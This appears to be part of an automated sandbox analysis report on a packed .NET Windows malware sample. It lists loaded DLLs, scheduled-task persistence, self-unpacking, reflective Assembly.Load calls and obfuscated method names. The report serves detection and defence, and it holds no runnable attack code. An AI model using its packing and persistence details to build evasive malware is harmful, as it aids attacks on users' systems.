Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: nzLoHpgAln.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: nzLoHpgAln.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Unpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Unpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack

.NET source code contains potential unpacker

Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs	.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs	.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
Source: 0.2.nzLoHpgAln.exe.3c71a18.1.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.nzLoHpgAln.exe.93c0000.5.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs	.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
Source: 10.2.wZWwzQVEakJvEU.exe.44b3ad8.4.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs	.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs	.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00042182 push FFFFFFB1h; retf	0_2_00042184
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_000420F3 push ss; ret	0_2_000420F9
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_0004227A push ecx; ret	0_2_0004227B
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008122C7 push edi; retf	0_2_008122CD
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C3C5D0 push es; retn 0009h	0_2_09C3C5D2
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C3C5A9 push es; retn 0009h	0_2_09C3C5AA
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C3DBE9 push ss; retn 0009h	0_2_09C3DBEA
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C3DD38 push edi; retn 0009h	0_2_09C3DD3A
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C3D239 push cs; retn 0009h	0_2_09C3D23A
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F4CCA0 push 09F4CFEFh; iretd	0_2_09F4CFE3
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F40979 pushfd ; retn 0009h	0_2_09F4097A
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F404E8 push esp; ret	0_2_09F404E9
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_06712DB8 pushad ; retf 5505h	8_2_06712EB6
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB22C7 push edi; retf	10_2_00FB22CD
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A0404E8 push esp; ret	10_2_0A0404E9
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A9E5C0 push es; ret	14_2_06A9E5D0

Source: nzLoHpgAln.exe	Static PE information: section name: .text entropy: 7.677345826852639
Source: wZWwzQVEakJvEU.exe.0.dr	Static PE information: section name: .text entropy: 7.677345826852639

Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, Vs82vkHUR5m9RCYE2bP.cs	High entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, lF62eOBaEgEorXmRSl.cs	High entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, Dqnxs234kMblUpWIWe.cs	High entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, R9ihZtK1dSap2DSgRG.cs	High entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, rdDn9AZRble9iQ9Uqj.cs	High entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, hKo5edfWLak4Bbqtne.cs	High entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, WTdydw7kwQos9Ag2hA.cs	High entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, c2189dMeFcQwlCkDNo.cs	High entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, JbGBKdj6ZIOo4f2BPQ.cs	High entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs	High entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, DgkowV47Dh3Fxfd92L.cs	High entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, fKewcCzIDSttxbv6Cl.cs	High entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, T2nxZyWI6ZVQTBtP96.cs	High entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, ssoHYO9CZv0DV6pGUv.cs	High entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, fJ02oKDU7jd18ANgNc.cs	High entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, XnxfdvL1wIjOTvPVmK.cs	High entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, HFhy6EHAGyTn8yOrkLt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, DKJ6PHUd9naUoeJCna.cs	High entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, tViMi8xroKHTbcHbOM.cs	High entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, k27kfyHHonG7KUUcJBK.cs	High entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, bXPpnuV1cYWsbLvy9E.cs	High entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, BZ0TvmwFdgLu3v1uns.cs	High entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, Vs82vkHUR5m9RCYE2bP.cs	High entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, lF62eOBaEgEorXmRSl.cs	High entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, Dqnxs234kMblUpWIWe.cs	High entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, R9ihZtK1dSap2DSgRG.cs	High entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, rdDn9AZRble9iQ9Uqj.cs	High entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, hKo5edfWLak4Bbqtne.cs	High entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, WTdydw7kwQos9Ag2hA.cs	High entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, c2189dMeFcQwlCkDNo.cs	High entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, JbGBKdj6ZIOo4f2BPQ.cs	High entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs	High entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, DgkowV47Dh3Fxfd92L.cs	High entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, fKewcCzIDSttxbv6Cl.cs	High entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, T2nxZyWI6ZVQTBtP96.cs	High entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, ssoHYO9CZv0DV6pGUv.cs	High entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, fJ02oKDU7jd18ANgNc.cs	High entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, XnxfdvL1wIjOTvPVmK.cs	High entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, HFhy6EHAGyTn8yOrkLt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, DKJ6PHUd9naUoeJCna.cs	High entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, tViMi8xroKHTbcHbOM.cs	High entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, k27kfyHHonG7KUUcJBK.cs	High entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, bXPpnuV1cYWsbLvy9E.cs	High entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, BZ0TvmwFdgLu3v1uns.cs	High entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, Vs82vkHUR5m9RCYE2bP.cs	High entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, lF62eOBaEgEorXmRSl.cs	High entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, Dqnxs234kMblUpWIWe.cs	High entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, R9ihZtK1dSap2DSgRG.cs	High entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
